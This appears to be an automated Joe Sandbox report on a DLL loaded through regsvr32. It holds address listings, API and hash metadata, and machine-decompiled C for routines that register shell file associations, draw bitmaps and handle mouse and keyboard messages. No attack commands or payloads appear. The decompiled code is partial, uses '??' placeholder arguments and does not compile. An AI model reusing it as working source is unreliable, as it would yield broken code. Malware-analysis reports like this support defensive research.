                                                                              0x10034f99
                                                                              0x10034fa0
                                                                              0x10034faa
                                                                              0x10034faf
                                                                              0x10034fb2
                                                                              0x10034fb2
                                                                              0x10034fbb
                                                                              0x10034fc2
                                                                              0x10034fcc
                                                                              0x10034fd1
                                                                              0x10034fd4
                                                                              0x10034fd4
                                                                              0x10034fdd
                                                                              0x10034fe4
                                                                              0x10034fee
                                                                              0x10034ff7
                                                                              0x10034ffa
                                                                              0x10034ffa
                                                                              0x00000000
                                                                              0x10034fee
                                                                              0x10034e52
                                                                              0x10034e5e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10034e6c
                                                                              0x10034e76
                                                                              0x10034e7b
                                                                              0x10034e82
                                                                              0x10034e94
                                                                              0x10034e9e
                                                                              0x10034eb4
                                                                              0x10034ebe
                                                                              0x10034ec3
                                                                              0x10034ec3
                                                                              0x00000000
                                                                              0x10034e82
                                                                              0x10034d0b
                                                                              0x10034d1f
                                                                              0x10034d24
                                                                              0x10034d3b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10034d46
                                                                              0x10034d4d
                                                                              0x10034d57
                                                                              0x10034d5c
                                                                              0x10034d5f
                                                                              0x10034d5f
                                                                              0x10034d68
                                                                              0x10034d6f
                                                                              0x10034d79
                                                                              0x10034d7e
                                                                              0x10034d81
                                                                              0x10034d81
                                                                              0x10034d8a
                                                                              0x10034d91
                                                                              0x10034d9b
                                                                              0x10034da0
                                                                              0x10034da3
                                                                              0x10034da3
                                                                              0x10034dac
                                                                              0x10034db3
                                                                              0x10034dbd
                                                                              0x10034dc2
                                                                              0x10034dc5
                                                                              0x10034dc5
                                                                              0x10034dce
                                                                              0x10034dd5
                                                                              0x10034ddf
                                                                              0x10034de4
                                                                              0x10034de7
                                                                              0x10034de7
                                                                              0x10034df0
                                                                              0x10034df7
                                                                              0x10034e01
                                                                              0x10034e06
                                                                              0x10034e09
                                                                              0x10034e09
                                                                              0x10034e12
                                                                              0x10034e19
                                                                              0x10034e23
                                                                              0x10034e2c
                                                                              0x10034e2f
                                                                              0x10034e2f
                                                                              0x10034c0d
                                                                              0x10034c12
                                                                              0x10034c19
                                                                              0x10034c23
                                                                              0x10034c28
                                                                              0x10034c2b
                                                                              0x10034c2b
                                                                              0x10034c34
                                                                              0x10034c3b
                                                                              0x10034c45
                                                                              0x10034c4a
                                                                              0x10034c4d
                                                                              0x10034c4d
                                                                              0x10034c56
                                                                              0x10034c5d
                                                                              0x10034c67
                                                                              0x10034c6c
                                                                              0x10034c6f
                                                                              0x10034c6f
                                                                              0x10034c78
                                                                              0x10034c7f
                                                                              0x10034c89
                                                                              0x10034c8e
                                                                              0x10034c91
                                                                              0x10034c91
                                                                              0x10034c9a
                                                                              0x10034ca1
                                                                              0x10034cab
                                                                              0x10034cb0
                                                                              0x10034cb3
                                                                              0x10034cb3
                                                                              0x10034cbc
                                                                              0x10034cc3
                                                                              0x10034ccd
                                                                              0x10034cd2
                                                                              0x10034cd5
                                                                              0x10034cd5
                                                                              0x10034cde
                                                                              0x10034ce5
                                                                              0x10034cef
                                                                              0x10034cf8
                                                                              0x10034cfb
                                                                              0x10034cfb
                                                                              0x10034cef
                                                                              0x00000000
                                                                              0x10034c07
                                                                              0x10034bc3
                                                                              0x10034a77
                                                                              0x10034a7e
                                                                              0x10034a81
                                                                              0x10034a86
                                                                              0x100359e0
                                                                              0x00000000
                                                                              0x10034a8c
                                                                              0x10034a92
                                                                              0x10034a95
                                                                              0x10034a99
                                                                              0x10034aa3
                                                                              0x10034aa8
                                                                              0x10034ab2
                                                                              0x10034abe
                                                                              0x10034adf
                                                                              0x10034aee
                                                                              0x10034ac0
                                                                              0x10034ac0
                                                                              0x10034acf
                                                                              0x10034ad7
                                                                              0x10034ad7
                                                                              0x10034af3
                                                                              0x10034af8
                                                                              0x10034aff
                                                                              0x10034aff
                                                                              0x10034b04
                                                                              0x10034b0a
                                                                              0x10034b11
                                                                              0x10034b16
                                                                              0x10034b1b
                                                                              0x10034b1d
                                                                              0x10034b20
                                                                              0x10034b23
                                                                              0x10034b23
                                                                              0x00000000
                                                                              0x10034b1b
                                                                              0x10034a86
                                                                              0x10035a1d
                                                                              0x00000000

                                                                              APIs
                                                                              • ExtractIconW.SHELL32 ref: 10034AB2
                                                                              • DestroyIcon.USER32 ref: 10034AD7
                                                                                • Part of subcall function 10033CC4: lstrlenW.KERNEL32 ref: 10033CE0
                                                                                • Part of subcall function 10033CC4: RegSetValueW.ADVAPI32 ref: 10033CFD
                                                                                • Part of subcall function 10033CC4: RegCreateKeyW.ADVAPI32 ref: 10033D1B
                                                                                • Part of subcall function 10033CC4: lstrlenW.KERNEL32 ref: 10033D28
                                                                                • Part of subcall function 10033CC4: RegSetValueExW.ADVAPI32 ref: 10033D4C
                                                                                • Part of subcall function 10033CC4: RegCloseKey.ADVAPI32 ref: 10033D59
                                                                              • RegQueryValueW.ADVAPI32 ref: 10035714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value$Iconlstrlen$CloseCreateDestroyExtractQuery
                                                                              • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                                                                              • API String ID: 1149682616-4043335175
                                                                              • Opcode ID: cea217789182d180420c3cd7615ea75c17804ac2dcf846c9623b648205401e9f
                                                                              • Instruction ID: 3c3fab047d36ac2c29d0629737a988a25d40750190f7fd9311b6661758d04c1f
                                                                              • Opcode Fuzzy Hash: cea217789182d180420c3cd7615ea75c17804ac2dcf846c9623b648205401e9f
                                                                              • Instruction Fuzzy Hash: 59B249B6601E4587DA01DB29D84164E73A0FB85BFAF049312AA7D8B7E4EF7CD884C744
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000D0EC Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 246windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E1000D0EC(void* __ebx, void* __edi, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				long long _v72;
				char _v88;
				char _v104;
				signed int _v128;
				char _v136;
				void* _v144;
				char _v152;
				signed short _v166;
				signed short _v168;
				intOrPtr _v176;
				signed int _v180;
				char _v184;
				intOrPtr _v192;
				long long _v200;
				void* _v208;
				char _v216;
				signed int _v232;
				intOrPtr _v240;
				intOrPtr _v248;
				signed int _v256;
				long long _v264;
				void* _t118;
				void* _t182;
				void* _t194;
				signed int _t197;
				void* _t259;
				char* _t263;
				void* _t264;
				void* _t265;
				long long _t266;

				_t264 = __r9;
				_t157 = __ebx;
				_t265 = _t259;
				_v72 = 0xfffffffe;
				r12d = r8d;
				_t194 = __rdx;
				_v216 = 0x10055878;
				r13d = 0;
				_v208 = _t266;
				_v200 = _t266;
				_v192 = r13d;
				 *((long long*)(_t265 - 0x58)) = 0x10055878;
				 *((long long*)(_t265 - 0x50)) = _t266;
				 *((long long*)(_t265 - 0x48)) = _t266;
				 *((intOrPtr*)(_t265 - 0x40)) = r13d;
				 *((long long*)(_t265 - 0x60)) = _t266;
				_t193 = 0x10055dd0;
				 *((long long*)(_t265 - 0x68)) = 0x10055dd0;
				E1000D050(__ebx, GetSysColor(??),  &_v104, _t265);
				E1000D050(__ebx, GetSysColor(??),  &_v88, _t265);
				CreateCompatibleDC(??);
				if(E1000CA04(__ebx, 0x10055dd0,  &_v216, 0x10055dd0, __r8, _t265) == r13d) {
					L13:
					_v88 = 0x10055188;
					E1000CECC(_t193,  &_v88);
					_v104 = 0x10055188;
					E1000CECC(_t193,  &_v104);
					_v152 = 0x10055188;
					E1000CECC(_t193,  &_v152);
					E1000CA9C( &_v136);
					_t118 = E1000CA9C( &_v216);
				} else {
					CreateCompatibleDC();
					if(E1000CA04(__ebx, 0x10055dd0,  &_v136, 0x10055dd0, __r8, _t265) == r13d) {
						goto L13;
					} else {
						_t263 =  &_v184;
						GetObjectW(??, ??, ??);
						E1000CECC(0x10055dd0, _t194);
						r9d = _v166 & 0x0000ffff;
						r8d = _v168 & 0x0000ffff;
						_v264 = _t266;
						CreateBitmap(??, ??, ??, ??, ??);
						if(E1000CE50(_t157, 0x10055dd0, _t194, 0x10055dd0, _t265) == r13d) {
							goto L13;
						} else {
							_v264 = _t266;
							_t27 = _t266 + 1; // 0x1
							r9d = _t27;
							r8d = r9d;
							CreateBitmap(??, ??, ??, ??, ??);
							if(E1000CE50(_t157, 0x10055dd0,  &_v152, 0x10055dd0, _t265) == r13d) {
								goto L13;
							} else {
								SelectObject();
								E1000CE2C(0x10055dd0, 0x10055dd0);
								SelectObject(??, ??);
								E1000CE2C(0x10055dd0, 0x10055dd0);
								if(0x10055dd0 == _t266 || 0x10055dd0 == _t266) {
									_v88 = 0x10055188;
									E1000CECC(_t193,  &_v88);
									_v104 = 0x10055188;
									E1000CECC(_t193,  &_v104);
									_v152 = 0x10055188;
									E1000CECC(_t193,  &_v152);
									E1000CA9C( &_v136);
									_t118 = E1000CA9C( &_v216);
								} else {
									r8d = 0;
									_t182 = E1000C0A4(GetPixel(??, ??, ??),  &_v216);
									_v232 = 0xcc0020;
									_v240 = r13d;
									_v248 = r13d;
									_v256 = _v208;
									_v264 = _v176;
									r9d = _v180;
									r8d = 0;
									BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
									E1000C0A4(0xffffff,  &_v216);
									_v232 = 0x1100a6;
									_v240 = r13d;
									_v248 = r13d;
									_t193 = _v208;
									_v256 = _t193;
									_v264 = _v176;
									r9d = _v180;
									r8d = 0;
									BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
									if(_t194 != _t266) {
									}
									SelectObject();
									E1000CE2C(_t193, _t193);
									if(_t193 != _t266) {
										_v256 = r12d;
										_v264 = _v176;
										r9d = _v180;
										r8d = 0;
										E1002A518(0, _t193,  &_v216);
										E1000C0A4(0xffffff,  &_v216);
										E1000CF7C(0xffffff,  &_v216,  &_v104, _t263, _t264, _t265);
										_t197 = _t193;
										r12d = 0xe20746;
										_v232 = r12d;
										_v240 = r13d;
										_v248 = r13d;
										_v256 = _v128;
										_v264 = _v176;
										r9d = _v180;
										r8d = 1;
										BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
										_t75 =  &_v88; // 0xe20816
										_t76 =  &_v216; // 0xe20796
										E1000CF7C(1, _t76, _t75, _t263, _t264, _t265);
										_v232 = r12d;
										_v240 = r13d;
										_v248 = r13d;
										_t193 = _v128;
										_v256 = _v128;
										_v264 = _v176;
										r9d = _v180;
										r8d = 0;
										BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
										_t86 =  &_v216; // 0xe20796
										E1000CF7C(0, _t86, _t197, _t263, _t264, _t265);
										_t87 =  &_v216; // 0xe20796
										E1000C0A4(_t182, _t87);
									}
									SelectObject();
									E1000CE2C(_t193, _t193);
									SelectObject(??, ??);
									E1000CE2C(_t193, _t193);
									goto L13;
								}
							}
						}
					}
				}
				return _t118;
			}

































                                                                              0x1000d0ec
                                                                              0x1000d0ec
                                                                              0x1000d0f5
                                                                              0x1000d0ff
                                                                              0x1000d10b
                                                                              0x1000d10e
                                                                              0x1000d11b
                                                                              0x1000d120
                                                                              0x1000d123
                                                                              0x1000d128
                                                                              0x1000d12d
                                                                              0x1000d132
                                                                              0x1000d136
                                                                              0x1000d13a
                                                                              0x1000d13e
                                                                              0x1000d142
                                                                              0x1000d146
                                                                              0x1000d14d
                                                                              0x1000d165
                                                                              0x1000d17f
                                                                              0x1000d187
                                                                              0x1000d19d
                                                                              0x1000d4e8
                                                                              0x1000d4ef
                                                                              0x1000d4ff
                                                                              0x1000d505
                                                                              0x1000d515
                                                                              0x1000d51b
                                                                              0x1000d52b
                                                                              0x1000d539
                                                                              0x1000d544
                                                                              0x1000d1a3
                                                                              0x1000d1a5
                                                                              0x1000d1be
                                                                              0x00000000
                                                                              0x1000d1c4
                                                                              0x1000d1c4
                                                                              0x1000d1d1
                                                                              0x1000d1da
                                                                              0x1000d1df
                                                                              0x1000d1e8
                                                                              0x1000d1f1
                                                                              0x1000d1fe
                                                                              0x1000d212
                                                                              0x00000000
                                                                              0x1000d218
                                                                              0x1000d218
                                                                              0x1000d21d
                                                                              0x1000d21d
                                                                              0x1000d221
                                                                              0x1000d22c
                                                                              0x1000d245
                                                                              0x00000000
                                                                              0x1000d24b
                                                                              0x1000d254
                                                                              0x1000d25d
                                                                              0x1000d275
                                                                              0x1000d27e
                                                                              0x1000d289
                                                                              0x1000d48c
                                                                              0x1000d49c
                                                                              0x1000d4a2
                                                                              0x1000d4b2
                                                                              0x1000d4b8
                                                                              0x1000d4c8
                                                                              0x1000d4d6
                                                                              0x1000d4e1
                                                                              0x1000d298
                                                                              0x1000d298
                                                                              0x1000d2b4
                                                                              0x1000d2b6
                                                                              0x1000d2be
                                                                              0x1000d2c3
                                                                              0x1000d2cd
                                                                              0x1000d2d6
                                                                              0x1000d2da
                                                                              0x1000d2df
                                                                              0x1000d2ec
                                                                              0x1000d2fc
                                                                              0x1000d301
                                                                              0x1000d309
                                                                              0x1000d30e
                                                                              0x1000d313
                                                                              0x1000d318
                                                                              0x1000d321
                                                                              0x1000d325
                                                                              0x1000d32a
                                                                              0x1000d337
                                                                              0x1000d340
                                                                              0x1000d340
                                                                              0x1000d350
                                                                              0x1000d359
                                                                              0x1000d361
                                                                              0x1000d367
                                                                              0x1000d370
                                                                              0x1000d374
                                                                              0x1000d379
                                                                              0x1000d383
                                                                              0x1000d392
                                                                              0x1000d3a4
                                                                              0x1000d3a9
                                                                              0x1000d3ac
                                                                              0x1000d3b2
                                                                              0x1000d3b7
                                                                              0x1000d3bc
                                                                              0x1000d3c9
                                                                              0x1000d3d2
                                                                              0x1000d3d6
                                                                              0x1000d3e0
                                                                              0x1000d3e8
                                                                              0x1000d3ee
                                                                              0x1000d3f6
                                                                              0x1000d3fb
                                                                              0x1000d400
                                                                              0x1000d405
                                                                              0x1000d40a
                                                                              0x1000d40f
                                                                              0x1000d417
                                                                              0x1000d420
                                                                              0x1000d424
                                                                              0x1000d429
                                                                              0x1000d433
                                                                              0x1000d43c
                                                                              0x1000d441
                                                                              0x1000d448
                                                                              0x1000d44d
                                                                              0x1000d44d
                                                                              0x1000d45e
                                                                              0x1000d467
                                                                              0x1000d475
                                                                              0x1000d47e
                                                                              0x00000000
                                                                              0x1000d47e
                                                                              0x1000d289
                                                                              0x1000d245
                                                                              0x1000d212
                                                                              0x1000d1be
                                                                              0x1000d558

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateSelect$Color$BitmapCompatible$BrushPixelSolid
                                                                              • String ID:
                                                                              • API String ID: 3358463585-3916222277
                                                                              • Opcode ID: 93b2da3c30844da4c14c6ad4dfbf376c526cb87347fe4623b5adfe0c628bd0a4
                                                                              • Instruction ID: e891f7def435ab11e4816c1c0538a21915fb24b484ca949a1d6e8f4e7db37715
                                                                              • Opcode Fuzzy Hash: 93b2da3c30844da4c14c6ad4dfbf376c526cb87347fe4623b5adfe0c628bd0a4
                                                                              • Instruction Fuzzy Hash: E7B10C3A218A8496E720DB25F85179FB761F7C97D4F504226EA8D43B68DF78D889CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002DD04 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 326windowkeyboardCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E1002DD04(long long __rax, intOrPtr* __rcx, intOrPtr* __rdx, void* __r9, char _a16, long long _a24, signed short _a28) {
				signed int _v148;
				char _v152;
				long long _v168;
				intOrPtr _v200;
				intOrPtr _v208;
				unsigned int _v248;
				intOrPtr _v264;
				intOrPtr _v272;
				intOrPtr _v280;
				long _t69;
				void* _t75;
				long _t76;
				int _t78;
				void* _t84;
				signed int _t92;
				intOrPtr _t100;
				void* _t107;
				void* _t121;
				signed int _t128;
				long long _t142;
				long long _t144;
				void* _t146;
				long long _t147;
				intOrPtr* _t181;
				long long _t188;
				intOrPtr* _t189;
				void* _t192;
				unsigned int* _t195;
				void* _t200;
				intOrPtr* _t201;
				char* _t202;
				void* _t205;
				unsigned long long _t208;
				intOrPtr* _t210;
				long long _t211;
				long long _t212;
				long long _t213;
				long long _t215;

				_t200 = __r9;
				_t181 = __rdx;
				_t148 = __rcx;
				_t142 = __rax;
				_v168 = 0xfffffffe;
				_t210 = __rdx;
				_t189 = __rcx;
				_t100 =  *((intOrPtr*)(__rdx + 8));
				_t128 = 1;
				r15d = 0;
				if(_t100 == 0x200 || _t100 == 0xa0 || _t100 == 0x202 || _t100 == 0x205 || _t100 == 0x208) {
					_t69 = GetKeyState();
					if(_t69 < r15w) {
						goto L54;
					}
					_t69 = GetKeyState();
					if(_t69 < r15w) {
						goto L54;
					}
					_t106 = 4;
					_t69 = GetKeyState(??);
					if(_t69 < r15w) {
						goto L54;
					}
					E1000A5CC(_t100, 4, _t107, _t121, _t142, _t148, _t181, _t192, _t200, _t205);
					_t188 = _t142;
					_t69 = E10011808(_t100, _t107, _t142,  *_t210, _t181, _t192, _t200, _t205);
					r12d = 0x401;
					if(_t142 == _t213) {
						L11:
						if(_t142 == _t189) {
							_t147 =  *((intOrPtr*)(_t188 + 0x78));
							_t152 = _t189;
							E10011C1C(_t142, _t189);
							_t211 = _t142;
							__eflags = _t147 - _t213;
							if(__eflags == 0) {
								L21:
								_t106 = 0xe0;
								E10009454(__eflags, _t142, _t152);
								_a24 = _t142;
								__eflags = _t142 - _t213;
								if(_t142 == _t213) {
									_t147 = _t213;
								} else {
									E1002D8EC(_t142, _t142, _t181, _t192);
									_t147 = _t142;
								}
								r8d = _t128;
								_t181 = _t211;
								_t75 =  *((intOrPtr*)( *_t147 + 0x268))();
								__eflags = _t75 - r15d;
								if(_t75 != r15d) {
									r9d = 0;
									r8d = 0;
									__eflags = r8d;
									_t76 = SendMessageW(??, ??, ??, ??);
									 *((long long*)(_t188 + 0x78)) = _t147;
									L27:
									r14d = 0x48;
									_t20 =  &_v152; // 0x4a1
									E1003A240(_t76, _t106, 0, _t20, _t181, _t211);
									_a16 =  *((intOrPtr*)(_t210 + 0x24));
									_t23 =  &_a16; // 0x549
									_t78 = ScreenToClient(??, ??);
									_t25 =  &_v248; // 0x441
									E1003A240(_t78, _t106, 0, _t25, _t23, _t211);
									_v248 = 0x38;
									_t144 =  *_t189;
									_t195 =  &_v248;
									 *((intOrPtr*)(_t144 + 0xd8))();
									_t212 = _t144;
									__eflags = _t144 - 0xffffffff;
									_t69 = 0;
									_t215 =  ==  ? _t144 : _t189;
									__eflags =  *((intOrPtr*)(_t188 + 0x88)) - _t212;
									if( *((intOrPtr*)(_t188 + 0x88)) != _t212) {
										L33:
										__eflags = _t212 - 0xffffffff;
										if(_t212 == 0xffffffff) {
											r9d = 0;
											r8d = 0;
											SendMessageW(??, ??, ??, ??);
											L43:
											_t184 = _t210;
											E1002DC6C(_t106, _t144, _t147, _t210);
											_t201 =  *((intOrPtr*)(_t188 + 0x90));
											__eflags = _t201 - _t189;
											if(_t201 != _t189) {
												__eflags =  *_t201 - 0x38;
												if( *_t201 >= 0x38) {
													r8d = 0;
													__eflags = r8d;
													SendMessageW(??, ??, ??, ??);
												}
											}
											 *((long long*)(_t188 + 0x80)) = _t215;
											 *((long long*)(_t188 + 0x88)) = _t212;
											__eflags =  *((intOrPtr*)(_t188 + 0x90)) - _t189;
											if(__eflags == 0) {
												_t84 = E10009454(__eflags, _t144, _t147);
												 *((long long*)(_t188 + 0x90)) = _t144;
												E1003A240(_t84, _t106, 0, _t144, _t184, _t147);
											}
											_t69 = E1003AB00(_t106,  *((intOrPtr*)(_t188 + 0x90)),  &_v248, _t147);
											L51:
											_t162 = _v200;
											__eflags = _v200 - 0xffffffff;
											if(_v200 == 0xffffffff) {
												goto L79;
											}
											__eflags = _v208 - _t189;
											if(_v208 != _t189) {
												goto L79;
											}
											return E10039620(_t144, _t162);
										}
										_t36 =  &_v152; // 0x4a1
										r8d = 0x48;
										E1003AB00(_t106, _t36,  &_v248, _t195);
										_t208 = _v248 >> 0x20;
										r11d = r11d & 0x3fffffff;
										__eflags = r11d;
										_v148 = r11d;
										asm("bt dword [esi+0x78], 0xa");
										if(r11d < 0) {
											r11d = r11d | 0x00000020;
											__eflags = r11d;
											_v148 = r11d;
										}
										_t41 =  &_v152; // 0x4a1
										_t202 = _t41;
										r8d = 0;
										__eflags = r8d;
										SendMessageW(??, ??, ??, ??);
										asm("bt dword [esp+0x44], 0x1e");
										if(__eflags < 0) {
											L38:
											r9d = 0;
											__eflags = r9d;
											SendMessageW(??, ??, ??, ??);
											asm("bt dword [esi+0x78], 0xa");
											if(r9d < 0) {
												SendMessageW();
											}
											_v264 = 0x213;
											_v272 = 0;
											_v280 = 0;
											r9d = 0;
											r8d = 0;
											SetWindowPos(??, ??, ??, ??, ??, ??, ??);
											goto L43;
										} else {
											_t92 = E10014FAC(_t100, 0x432, _t121, __eflags, _t144, _t189, _t195, _t202, _t208);
											__eflags = _t92;
											if(_t92 == 0) {
												__eflags = 0;
												goto L43;
											}
											goto L38;
										}
									}
									__eflags =  *((intOrPtr*)(_t188 + 0x80)) - _t215;
									if(__eflags != 0) {
										goto L33;
									}
									asm("bt dword [esi+0x78], 0xa");
									if(__eflags >= 0) {
										__eflags = _t212 - 0xffffffff;
										if(_t212 == 0xffffffff) {
											__eflags = 0;
										} else {
											_t69 = E1002DC6C(_t106, _t144, _t147, _t210);
										}
									} else {
										GetCursorPos();
										r9d = _a28 & 0x0000ffff;
										r9d = r9d << 0x10;
										r8d = 0;
										_t69 = SendMessageW(??, ??, ??, ??);
									}
									goto L51;
								} else {
									return  *((intOrPtr*)( *_t147 + 8))();
								}
							}
							_t152 =  *((intOrPtr*)(_t147 + 0x70));
							__eflags =  *((intOrPtr*)(_t147 + 0x70)) - _t213;
							if( *((intOrPtr*)(_t147 + 0x70)) == _t213) {
								GetParent();
								_t152 = _t142;
								_t76 = E10011808(_t100, _t107, _t142, _t142, _t181, _t192, _t200, _t205);
							} else {
								_t76 = E10011808(_t100, _t107, _t142, _t152, _t181, _t192, _t200, _t205);
							}
							__eflags = _t142 - _t211;
							if(_t142 != _t211) {
								_t142 =  *_t147;
								 *((intOrPtr*)(_t142 + 0xc0))();
								_t152 = _t147;
								_t76 =  *((intOrPtr*)( *_t147 + 8))();
								 *((long long*)(_t188 + 0x78)) = _t213;
								_t147 = _t213;
							}
							__eflags = _t147 - _t213;
							if(__eflags != 0) {
								goto L27;
							} else {
								goto L21;
							}
						} else {
							if(_t142 != _t213) {
								goto L79;
							} else {
								 *((long long*)(_t188 + 0x80)) = _t213;
								 *((long long*)(_t188 + 0x88)) = 0xffffffff;
								return _t69;
							}
						}
					}
					while(( *(_t142 + 0x78) & r12d) == 0) {
						GetParent();
						_t69 = E10011808(_t100, _t107, _t142, _t142, _t181, _t192, _t200, _t205);
						if(_t142 != _t213) {
							continue;
						}
						goto L11;
					}
					goto L11;
				} else {
					L54:
					r12d = 0x401;
					__eflags =  *(_t189 + 0x78) & r12d;
					if(( *(_t189 + 0x78) & r12d) == 0) {
						L79:
						return _t69;
					}
					_t149 =  *_t210;
					_t69 = E10011808(_t100, _t107, _t142,  *_t210, _t181, _t192, _t200, _t205);
					__eflags = _t142 - _t213;
					if(_t142 == _t213) {
						L59:
						__eflags = _t142 - _t189;
						if(_t142 != _t189) {
							goto L79;
						}
						L60:
						__eflags = _t100 - 0x100;
						if(_t100 < 0x100) {
							L62:
							_t69 = _t146 - 0x104;
							__eflags = _t69 - 3;
							if(__eflags > 0) {
								_t128 = r15d;
							}
							L64:
							asm("bt dword [esi+0x78], 0xa");
							if(__eflags < 0) {
								goto L79;
							}
							__eflags = _t128 - r15d;
							if(_t128 != r15d) {
								L78:
								return E1000FBB4(_t128, _t107, _t142, _t149, _t181);
							}
							__eflags = _t100 - 0x201;
							if(_t100 == 0x201) {
								goto L78;
							}
							__eflags = _t100 - 0x203;
							if(_t100 == 0x203) {
								goto L78;
							}
							__eflags = _t100 - 0x204;
							if(_t100 == 0x204) {
								goto L78;
							}
							__eflags = _t100 - 0x206;
							if(_t100 == 0x206) {
								goto L78;
							}
							__eflags = _t100 - 0x207;
							if(_t100 == 0x207) {
								goto L78;
							}
							__eflags = _t100 - 0x209;
							if(_t100 == 0x209) {
								goto L78;
							}
							__eflags = _t100 - 0xa1;
							if(_t100 == 0xa1) {
								goto L78;
							}
							__eflags = _t100 - 0xa3;
							if(_t100 == 0xa3) {
								goto L78;
							}
							__eflags = _t100 - 0xa4;
							if(_t100 == 0xa4) {
								goto L78;
							}
							__eflags = _t100 - 0xa6;
							if(_t100 == 0xa6) {
								goto L78;
							}
							__eflags = _t100 - 0xa7;
							if(_t100 == 0xa7) {
								goto L78;
							}
							__eflags = _t100 - 0xa9;
							if(_t100 != 0xa9) {
								goto L79;
							}
							goto L78;
						}
						__eflags = _t100 - 0x109;
						if(__eflags <= 0) {
							goto L64;
						}
						goto L62;
					} else {
						goto L56;
					}
					while(1) {
						L56:
						__eflags = _t142 - _t189;
						if(_t142 == _t189) {
							goto L60;
						}
						__eflags =  *(_t142 + 0x78) & r12d;
						if(( *(_t142 + 0x78) & r12d) != 0) {
							goto L59;
						}
						GetParent();
						_t149 = _t142;
						_t69 = E10011808(_t100, _t107, _t142, _t142, _t181, _t192, _t200, _t205);
						__eflags = _t142 - _t213;
						if(_t142 != _t213) {
							continue;
						}
						goto L59;
					}
					goto L60;
				}
			}









































                                                                              0x1002dd04
                                                                              0x1002dd04
                                                                              0x1002dd04
                                                                              0x1002dd04
                                                                              0x1002dd18
                                                                              0x1002dd24
                                                                              0x1002dd27
                                                                              0x1002dd2a
                                                                              0x1002dd2d
                                                                              0x1002dd32
                                                                              0x1002dd3b
                                                                              0x1002dd63
                                                                              0x1002dd6d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002dd78
                                                                              0x1002dd82
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002dd88
                                                                              0x1002dd8d
                                                                              0x1002dd97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002dd9d
                                                                              0x1002dda2
                                                                              0x1002dda9
                                                                              0x1002ddae
                                                                              0x1002ddb7
                                                                              0x1002ddd6
                                                                              0x1002ddd9
                                                                              0x1002ddfb
                                                                              0x1002ddff
                                                                              0x1002de02
                                                                              0x1002de07
                                                                              0x1002de0a
                                                                              0x1002de0d
                                                                              0x1002de5a
                                                                              0x1002de5a
                                                                              0x1002de5f
                                                                              0x1002de64
                                                                              0x1002de6c
                                                                              0x1002de6f
                                                                              0x1002de7e
                                                                              0x1002de71
                                                                              0x1002de74
                                                                              0x1002de79
                                                                              0x1002de79
                                                                              0x1002de84
                                                                              0x1002de87
                                                                              0x1002de8d
                                                                              0x1002de93
                                                                              0x1002de96
                                                                              0x1002dea8
                                                                              0x1002deab
                                                                              0x1002deab
                                                                              0x1002deb5
                                                                              0x1002debb
                                                                              0x1002debf
                                                                              0x1002debf
                                                                              0x1002deca
                                                                              0x1002ded2
                                                                              0x1002dedb
                                                                              0x1002dee3
                                                                              0x1002deef
                                                                              0x1002defa
                                                                              0x1002deff
                                                                              0x1002df04
                                                                              0x1002df0c
                                                                              0x1002df0f
                                                                              0x1002df1f
                                                                              0x1002df25
                                                                              0x1002df2b
                                                                              0x1002df2f
                                                                              0x1002df34
                                                                              0x1002df38
                                                                              0x1002df3f
                                                                              0x1002dfac
                                                                              0x1002dfac
                                                                              0x1002dfb0
                                                                              0x1002e081
                                                                              0x1002e084
                                                                              0x1002e08e
                                                                              0x1002e09a
                                                                              0x1002e09a
                                                                              0x1002e0a0
                                                                              0x1002e0a5
